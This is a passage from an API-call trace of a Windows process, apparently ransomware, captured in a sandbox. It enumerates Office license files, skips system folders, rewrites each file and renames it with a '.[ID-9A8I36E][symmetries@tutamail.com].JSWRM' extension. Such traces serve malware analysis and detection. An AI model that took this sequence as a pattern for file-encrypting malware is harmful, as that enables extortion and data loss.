lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe626f052, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe626f052, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe632dbcf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d95, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="O365PR~4.XRM")) returned 1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.373] lstrcmpiW (lpString1="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0105.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0105.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0105.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.374] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11669) returned 1 [0105.374] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0105.374] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0105.376] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.376] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0105.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.377] CloseHandle (hObject=0x45c) returned 1 [0105.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0105.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0105.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0105.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0105.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.377] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0105.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.378] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe61fc917, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe61fc917, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe62bb50d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eee, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Grace-ppd.xrm-ms", cAlternateFileName="O365PR~1.XRM")) returned 1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.378] lstrcmpiW (lpString1="O365ProPlusR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0105.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0105.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0105.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240f20, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0105.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0105.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0105.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0105.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0105.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0105.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0105.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0105.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0105.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.379] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24302) returned 1 [0105.379] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0105.379] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0105.382] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.382] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0105.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.382] CloseHandle (hObject=0x45c) returned 1 [0105.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0105.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0105.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0105.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0105.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0105.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0105.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0105.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0105.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0105.384] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62bb50d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe62bb50d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe651da72, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d63, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Grace-ul-oob.xrm-ms", cAlternateFileName="O3377F~1.XRM")) returned 1 [0105.384] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.384] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.384] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.384] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.384] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.384] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.384] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.385] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.385] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.385] lstrcmpiW (lpString1="O365ProPlusR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0105.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0105.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.386] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11619) returned 1 [0105.386] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0105.386] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0105.388] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.388] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0105.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.388] CloseHandle (hObject=0x45c) returned 1 [0105.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0105.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0105.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0105.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.388] HeapFree (in: hHeap=0x1e0000, 